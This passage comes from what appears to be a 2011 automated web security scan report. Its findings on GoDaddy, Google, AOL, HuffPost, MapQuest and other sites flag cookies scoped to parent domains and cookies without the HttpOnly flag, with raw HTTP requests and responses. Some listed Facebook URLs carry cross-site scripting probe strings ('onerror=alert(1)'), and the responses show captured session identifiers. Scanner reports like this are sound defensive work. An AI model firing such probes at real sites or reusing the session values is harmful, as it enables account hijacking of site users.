Connection: close

Response

10.112. https://www.godaddy.com/gdshop/registrar/search.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.113. https://www.godaddy.com/gdshop/website.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/website.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.114. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 05 May 2011 10:57:55 GMT
Expires: Thu, 05 May 2011 10:57:55 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

10.115. http://www.huffingtonpost.com/users/logout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/users/logout/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /users/logout/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

10.116. http://www.marketwatch.com/News/Story/Story.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.117. http://www.moviefone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moviefone.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.118. http://www.truveo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=univ_ent; showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

10.119. http://www.truveo.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11. Cookie without HttpOnly flag set previous next
There are 98 instances of this issue:

http://www.aol.com/
http://www.aol.com/ajax.jsp
http://www.crunchboard.com/opening/detailjob.php
http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
https://www.fightmagazine.com/mma-magazine/subscribe.asp
https://www.godaddy.com/gdshop/catalog.asp
https://www.godaddy.com/gdshop/hosting/landing.asp
https://www.godaddy.com/gdshop/registrar/search.asp
https://www.godaddy.com/gdshop/website.asp
http://www.mapquest.com/
http://www.mapquest.com/_svc/ad/getads
http://www.mapquest.com/_svc/apixel
http://www.mapquest.com/_svc/publishing/promo
http://www.mapquest.com/_svc/searchio
http://www.mapquest.com/cdn/_uac/adpage.htm
http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg
http://www.mapquest.com/icons/stop.png
http://www.mmawarehouse.com/
http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm
http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm
http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm
http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm
http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm
http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm
http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm
http://www.truveo.com/
http://www.truveo.com/search
http://yellowpages.aol.com/
http://www.citysbest.com/
http://www.dailyfinance.com/
http://www.dailyfinance.com/
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx
http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx
http://www.facebook.com/
http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd
http://www.facebook.com/1242845259
http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b
http://www.facebook.com/2008/fbml
http://www.facebook.com/HockeyKen
http://www.facebook.com/KickIceForever
http://www.facebook.com/Loizza
http://www.facebook.com/burkerkink
http://www.facebook.com/careers/
http://www.facebook.com/deedee.perez1
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/fayse
http://www.facebook.com/find-friends
http://www.facebook.com/gale.l.schenk
http://www.facebook.com/help/
http://www.facebook.com/izaOllie
http://www.facebook.com/jezzas
http://www.facebook.com/kimberly.christ
http://www.facebook.com/ladonna.lokey
http://www.facebook.com/lakendra.roberts
http://www.facebook.com/login.php
http://www.facebook.com/matthew.oliveira2
http://www.facebook.com/mobile/
http://www.facebook.com/pages/create.php
http://www.facebook.com/patroyo
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/robynalys
http://www.facebook.com/share.php
http://www.facebook.com/sharer.php
http://www.facebook.com/skdarealist
http://www.facebook.com/stefanoboscolomarchi
http://www.facebook.com/theteebers
http://www.facebook.com/wmoppert
https://www.facebook.com/
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
https://www.facebook.com/login.php
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/create.php
https://www.facebook.com/recover.php
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
http://www.google.com/finance
http://www.huffingtonpost.com/include/geopromo.php
http://www.huffingtonpost.com/users/logout/
http://www.mapquest.com/directions
http://www.mapquest.com/maps
http://www.mapquest.com/routeplanner
http://www.marketwatch.com/News/Story/Story.aspx
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/
http://www.moviefone.com/
http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.pageflakes.com/subscribe.aspx
http://www.popeater.com/
http://www.tuaw.com/hub/app-reviews

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

11.1. http://www.aol.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aol.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.2. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 1138
Set-Cookie: JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol
Content-Length: 1138

<div id="local-module" class="mnid-local plid-60329">
<div id="localheader">

<h2><a href="http://www.aolnews.com/" class="lnid-sec1_lnk1"
name="om_local_title" target='_blank' >Local News
...[SNIP]...

11.3. http://www.crunchboard.com/opening/detailjob.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.crunchboard.com
Path:	/opening/detailjob.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /opening/detailjob.php HTTP/1.1
Host: www.crunchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 11:10:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/
Location: ./index.php
Vary: Accept-Encoding,User-Agent
Content-Length: 6901
Connection: close
Content-Type: text/html; charset=UTF-8

<script language="javascript" type="text/javascript">

   function hidestatus(URL)
   {
   /*var local= /http:|crunchboard.com/;
   var match = URL.search( local );
   if( match == -1 )
   {
   URL='http://tcbiz.p
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.5. https://www.fightmagazine.com/mma-magazine/subscribe.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.fightmagazine.com
Path:	/mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.6. https://www.godaddy.com/gdshop/catalog.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/gdshop/catalog.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQETSARRC=BJIOEHOAIADKADEGPIHAAKME; secure; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/catalog.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:20 GMT
Location: /catalog.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQETSARRC=BJIOEHOAIADKADEGPIHAAKME; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:20 GMT
Connection: close

11.7. https://www.godaddy.com/gdshop/hosting/landing.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.8. https://www.godaddy.com/gdshop/registrar/search.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/gdshop/registrar/search.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.9. https://www.godaddy.com/gdshop/website.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/gdshop/website.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.10. http://www.mapquest.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
t_Id=ZGVmYXVsdDpudWxs; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.11. http://www.mapquest.com/_svc/ad/getads previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/ad/getads

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.12. http://www.mapquest.com/_svc/apixel previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/apixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.13. http://www.mapquest.com/_svc/publishing/promo previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/publishing/promo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.14. http://www.mapquest.com/_svc/searchio previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/searchio

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.15. http://www.mapquest.com/cdn/_uac/adpage.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/cdn/_uac/adpage.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.16. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.17. http://www.mapquest.com/icons/stop.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/icons/stop.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.18. http://www.mmawarehouse.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mmawarehouse.com
Path:	/

Issue detail

